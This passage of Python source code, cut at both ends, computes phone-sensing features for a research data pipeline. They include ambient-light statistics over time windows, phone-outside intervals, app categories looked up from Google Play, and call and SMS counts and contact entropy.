datalist.append(d.sample)
if len(datalist) < data_frequency * 60 * 60 * minimum_data_percent / 100:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.mean(datalist)))
return new_data
def average_ambient_light_four_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Average ambient light (in flux) for each four hour window in a day. If the input light data is less than
minimum_data_percent%, which is default 40%, in a window then it will not generate any data point for that
window.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Average of ambient light over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < 1:
return None
data = lightdata
new_data = []
tmp_time = copy.deepcopy(data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < data_frequency * 4 * 60 * 60 * minimum_data_percent / 100:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.mean(datalist)))
return new_data
def variance_ambient_light_daily(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Variance of ambient light (in flux) for a day. If the input light data is less than minimum_data_percent%
which is default 40%, it will return None.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Variance of ambient light over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < data_frequency * 24 * 60 * 60 * minimum_data_percent / 100:
return None
start_time = datetime.datetime.combine(lightdata[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=lightdata[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
return [DataPoint(start_time, end_time, lightdata[0].offset, np.var([x.sample for x in lightdata]))]
def variance_ambient_light_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Variance of ambient light (in flux) for each hour window in a day. If the input light data is less than
minimum_data_percent%, which is default 40%, in a window then it will not generate any data point for that window.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Variance of ambient light over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < 1:
return None
data = lightdata
new_data = []
tmp_time = copy.deepcopy(data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < data_frequency * 60 * 60 * minimum_data_percent / 100:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def variance_ambient_light_four_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Variance of ambient light (in flux) for each four hour window in a day. If the input light data is
less than minimum_data_percent%, which is default 40%, in a window then it will not generate any data
point for that window.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Variance of ambient light over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < 1:
return None
data = lightdata
new_data = []
tmp_time = copy.deepcopy(data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < data_frequency * 4 * 60 * 60 * minimum_data_percent / 100:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def calculate_phone_outside_duration(self, data: List[DataPoint],
phone_inside_threshold_second: float=60) -> List[DataPoint]:
"""
Finds the duration (start_time and end_time) of phone outside (not in pocket or parse).
It uses a threshold (phone_inside_threshold_second), such that, if there is a duration of
at least this amount of consecutive time the phone proximity is 0, then this will be a
period of phone inside.
:param List(DataPoint) data: Phone proximity Datastream
:param float phone_inside_threshold_second: Threshold in seconds, that is allowed with
proximity 0 with phone outside
:return: DataPoints containing intervals of phone outside
:rtype: List(DataPoint)
"""
outside_data = []
threshold = timedelta(seconds=phone_inside_threshold_second)
L = len(data)
i = 0
while i < L and data[i].sample == 0:
i += 1
if i == L:
return outside_data
start = data[i].start_time
while i < L:
while i < L and data[i].sample > 0:
i += 1
if i == L:
outside_data.append(DataPoint(start, data[i - 1].start_time, data[i - 1].offset, "Outside"))
break
cur = data[i].start_time
while i < L and data[i].sample == 0:
i += 1
if i == L or i < L and data[i].start_time - cur >= threshold:
outside_data.append(DataPoint(start, cur, data[0].offset, "Outside"))
if i < L:
start = data[i].start_time
return outside_data
# lru_cache is used to cache the result of this function
@lru_cache(maxsize=256)
def get_app_category(self, appid: str) -> List[str]:
"""
Fetch and parse the google play store page of the android app
and return the category. If there are multiple category it will
return the first one in the webpage. Only for the GAME category
it will return the sub-category also.
:param str appid: package name of an app
:return: [package_name, category (if exists, otherwise None) ,
app_name (if exists, otherwise None), sub_category (if exists, otherwise None)]
:rtype: List(str)
"""
appid = appid.strip()
if appid == "com.samsung.android.messaging":
return [appid, "Communication", "Samsung Message", None]
url = "https://play.google.com/store/apps/details?id=" + appid
cached_response = None
#cached_response = self.CC.get_cache_value(appid)
response = None
if cached_response is None:
try:
time.sleep(2.0)
self.CC.logging.log('%s not found in cache.' % (appid))
response = urlopen(url)
except Exception:
toreturn = [appid, None, None, None]
objstr = base64.b64encode(pickle.dumps(toreturn))
#self.CC.set_cache_value(appid, objstr.decode())
return toreturn
else:
return pickle.loads(base64.decodebytes(cached_response.encode()))
soup = BeautifulSoup(response, 'html.parser')
text = soup.find('span', itemprop='genre')
name = soup.find('div', class_='id-app-title')
cat = soup.find('a', class_='document-subtitle category')
if cat:
category = cat.attrs['href'].split('/')[-1]
else:
category = None
toreturn = None
if category and category.startswith('GAME_'):
toreturn = [appid, "Game", str(name.contents[0]) if name else None, str(text.contents[0])]
elif text:
toreturn = [appid, str(text.contents[0]), str(name.contents[0]) if name else None, None]
else:
toreturn = [appid, None, str(name.contents[0]) if name else None, None]
objstr = base64.b64encode(pickle.dumps(toreturn))
self.CC.set_cache_value(appid, objstr.decode())
return toreturn
def get_appusage_duration_by_category(self, appdata: List[DataPoint], categories: List[str],
appusage_gap_threshold_seconds: float=120) -> List:
"""
Given the app category, it will return the list of duration when the app was used.
It is assumed that if the gap between two consecutive data points with same app usage
is within the appusage_gap_threshold_seconds time then, the app usage is in same session.
:param List(DataPoint) appdata: App category data stream
:param List(str) categories: List of app categories of which the usage duration should be calculated
:param float appusage_gap_threshold_seconds: Threshold in seconds, which is the gap allowed between two
consecutive DataPoint of same app
:return: A list of intervals of the given apps (categories) usage [start_time, end_time, category]
:rtype: List
"""
appdata = sorted(appdata, key=lambda x: x.start_time)
appusage = []
i = 0
threshold = timedelta(seconds=appusage_gap_threshold_seconds)
while i < len(appdata):
d = appdata[i]
category = d.sample[1]
if category not in categories:
i += 1
continue
j = i + 1
while j < len(appdata) and d.sample == appdata[j].sample \
and appdata[j - 1].start_time + threshold <= appdata[j].start_time:
j += 1
if j > i + 1:
appusage.append([d.start_time, appdata[j - 1].start_time, category])
i = j - 1
i += 1
return appusage
def appusage_interval_list(self, data: List[DataPoint], appusage: List) -> List[int]:
"""
Helper function to get screen touch gap for specific app categories
:param List(DataPoint) data: Phone screen touch data stream
:param List appusage: list of app usage duration of specific app categories of the form
[start_time, end_time, category]
:return: A list of integers containing screen touch gap as in touch screen timestamp unit (milliseconds)
:rtype: List(int)
"""
ret = []
i = 0
for a in appusage:
while i < len(data) and data[i].start_time < a[0]:
i += 1
last = 0
while i < len(data) and data[i].start_time <= a[1]:
if last > 0:
ret.append(int(data[i].sample - last))
last = data[i].sample
i += 1
return ret
def label_appusage_intervals(self, data: List[DataPoint], appusage: List, intervals: List,
interval_label: List[str]) -> List[DataPoint]:
"""
Helper function to label screen touch in a fixed app category usage
:param List(DataPoint) data: Phone touch screen data stream
:param List appusage: List appusage: list of app usage duration of specific app categories of the form
[start_time, end_time, category]
:param intervals: List of integers containing screen touch gap as in touch screen timestamp unit (milliseconds)
:param interval_label: A list of possible type of screen touch which are [typing, pause, reading, unknown]
:return: Labelled touche interval
:rtype: List(DataPoint)
"""
ret = []
i = 0
for a in appusage:
while i < len(data) and data[i].start_time < a[0]:
i += 1
last = None
while i < len(data) and data[i].start_time <= a[1]:
if last:
diff = (data[i].start_time - last).total_seconds()
for j in range(len(interval_label)):
if intervals[j][0] <= diff <= intervals[j][1]:
if len(ret) > 0:
last_entry = ret.pop()
if last_entry.end_time == last and last_entry.sample == interval_label[j]:
ret.append(DataPoint(start_time=last_entry.start_time,
end_time=data[i].start_time, offset=last_entry.offset,
sample=last_entry.sample))
else:
ret.append(last_entry)
ret.append(DataPoint(start_time=last, end_time=data[i].start_time,
offset=data[i].offset, sample=interval_label[j]))
else:
ret.append(DataPoint(start_time=last, end_time=data[i].start_time,
offset=data[i].offset, sample=interval_label[j]))
break;
last = data[i].start_time
i += 1
return ret
def process_appusage_day_data(self, user_id: str, appcategorydata: List[DataPoint],
input_appcategorystream: DataStream):
"""
Processing all app usage by category modules.
:param str user_id: UUID of the stream owner
:param List(DataPoint) appcategorydata: App category data stream
:param DataStream input_appcategorystream: DataStream object of app category stream
:return:
"""
data = {}
category_datapoints = []
try:
categories = list(set([y.sample[1] for y in appcategorydata if y.sample[1]]))
for c in categories:
d = self.get_appusage_duration_by_category(appcategorydata, [c], 300)
if d:
newd = [{"start_time": x[0], "end_time": x[1]} for x in d]
data[c] = newd
for interval in d:
category_datapoints.append(DataPoint(interval[0], interval[1], appcategorydata[0].offset, c))
if data:
st = appcategorydata[0].start_time.date()
start_time = datetime.datetime.combine(st, datetime.time.min)
start_time = start_time.replace(tzinfo=appcategorydata[0].start_time.tzinfo)
end_time = datetime.datetime.combine(st, datetime.time.max)
end_time = end_time.replace(tzinfo=appcategorydata[0].start_time.tzinfo)
dp = DataPoint(start_time, end_time, appcategorydata[0].offset, data)
self.store_stream(filepath="appusage_duration_by_category.json",
input_streams=[input_appcategorystream], user_id=user_id,
data=[dp], localtime=False)
if category_datapoints:
self.store_stream(filepath="appusage_by_category.json",
input_streams=[input_appcategorystream], user_id=user_id,
data=category_datapoints, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def get_contact_entropy(self, data: List[str]) -> float:
"""
Helper method to calculate entropy of a list of contacts
:param List(str) data: List of contacts
:return: Entropy of the given contact list
:rtype: float
"""
contact = {}
for d in data:
if d in contact:
contact[d] += 1
else:
contact[d] = 1
entropy = 0
for f in contact.values():
entropy -= f * math.log(f)
return entropy
def get_call_daily_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call for a whole day.
:param List(DataPoint) data: Phone call number data stream
:return: Entropy of phone call for 1 day window
:rtype: List(DataPoint) or None
"""
if not data:
return None
entropy = self.get_contact_entropy([d.sample for d in data])
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=entropy)]
return new_data
def get_call_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call for each hour in a day.
:param List(DataPoint) data: Phone call number data stream
:return: Entropy of phone call for 1 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_call_four_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call for each four hour window in a day.
:param List(DataPoint) data: Phone call number data stream
:return: Entropy of phone call for 4 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_sms_daily_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of SMS for a whole day.
:param List(DataPoint) data: SMS number data stream
:return: Entropy of sms for 1 day window
:rtype: List(DataPoint) or None
"""
if not data:
return None
entropy = self.get_contact_entropy([d.sample for d in data])
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=entropy)]
return new_data
def get_sms_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of SMS for each hour of a day.
:param List(DataPoint) data: SMS number data stream
:return: Entropy of SMS for 1 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_sms_four_hourly_entropy(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of SMS for each four hour window in a day.
:param List(DataPoint) data: SMS number data stream
:return: Entropy of SMS for 4 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_call_sms_daily_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call and SMS (combined) for a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Entropy of phone call and SMS for 1 day windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
entropy = self.get_contact_entropy([d.sample for d in data])
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=entropy)]
return new_data
def get_call_sms_hourly_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call and SMS (combined) for each one hour window in a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Entropy of phone call and SMS for 1 hour windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_call_sms_four_hourly_entropy(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Entropy of phone call and SMS (combined) for each four hour window in a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Entropy of phone call and SMS for 4 hour windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) == 0:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=self.get_contact_entropy(datalist)))
return new_data
def get_total_call_daily(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone calls in a day
:param List(DataPoint) data: Phone call number data stream
:return: Number of phone calls in a day
:rtype: List(DataPoint) or None
"""
if not data:
return None
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset, sample=len(data))]
return new_data
def get_total_call_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone calls for each hour in a day.
:param List(DataPoint) data: Phone call number data stream
:return: number of phone calls for 1 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def get_total_call_four_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone calls for each four hour in a day.
:param List(DataPoint) data: Phone call number data stream
:return: number of phone calls for 4 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def get_total_sms_daily(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of SMS in a day
:param List(DataPoint) data: SMS number data stream
:return: Number of SMS in a day
:rtype: List(DataPoint)
"""
if not data:
return None
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=len(data))]
return new_data
def get_total_sms_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of SMS for each hour in a day.
:param List(DataPoint) data: SMS number data stream
:return: number of sms for 1 hour windows
:rtype: List(DataPoint) or None
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def get_total_sms_four_hourly(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Number of SMS for each four hour in a day.
:param List(DataPoint) data: SMS number data stream
:return: number of SMS for 4 hour windows
:rtype: List(DataPoint)
"""
if not data:
return None
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def get_total_call_sms_daily(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone and SMS for a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Number of phone and SMS in 1 day windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=len(data))]
return new_data
def get_total_call_sms_hourly(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone and SMS for each one hour of a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Number of phone and SMS for 1 hour windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def get_total_call_sms_four_hourly(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Number of phone and SMS for each four hour window for a day.
:param List(DataPoint) calldata: Phone call number data stream
:param List(DataPoint) smsdata: SMS number data stream
:return: Number of phone and SMS in 4 hour windows
:rtype: List(DataPoint) or None
"""
data = calldata + smsdata
if not data:
return None
data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=len(datalist)))
return new_data
def process_callsmsnumber_day_data(self, user_id: str, call_number_data: List[DataPoint],
sms_number_data: List[DataPoint], input_callstream: DataStream, input_smsstream: DataStream):
"""
Process all phone call number and SMS number related modules
:param str user_id: UUID of the stream owner
:param List(DataPoint) call_number_data: Phone call number stream
:param List(DataPoint) sms_number_data: SMS number stream
:param DataStream input_callstream: DataStream object of phone call number
:param DataStream input_smsstream: DataStream object of SMS call number
:return:
"""
try:
data = self.get_call_sms_daily_entropy(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="call_sms_daily_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_call_sms_hourly_entropy(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="call_sms_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_call_sms_four_hourly_entropy(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="call_sms_four_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_call_daily_entropy(call_number_data)
if data:
self.store_stream(filepath="call_daily_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_call_hourly_entropy(call_number_data)
if data:
self.store_stream(filepath="call_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_call_four_hourly_entropy(call_number_data)
if data:
self.store_stream(filepath="call_four_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_sms_daily_entropy(sms_number_data)
if data:
self.store_stream(filepath="sms_daily_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_sms_hourly_entropy(sms_number_data)
if data:
self.store_stream(filepath="sms_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_sms_four_hourly_entropy(sms_number_data)
if data:
self.store_stream(filepath="sms_four_hourly_entropy.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_sms_daily(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="total_call_sms_daily.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_sms_hourly(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="total_call_sms_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_sms_four_hourly(call_number_data, sms_number_data)
if data:
self.store_stream(filepath="total_call_sms_four_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_daily(call_number_data)
if data:
self.store_stream(filepath="total_call_daily.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_hourly(call_number_data)
if data:
self.store_stream(filepath="total_call_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_call_four_hourly(call_number_data)
if data:
self.store_stream(filepath="total_call_four_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_sms_daily(sms_number_data)
if data:
self.store_stream(filepath="total_sms_daily.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_sms_hourly(sms_number_data)
if data:
self.store_stream(filepath="total_sms_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_sms_four_hourly(sms_number_data)
if data:
self.store_stream(filepath="total_sms_four_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
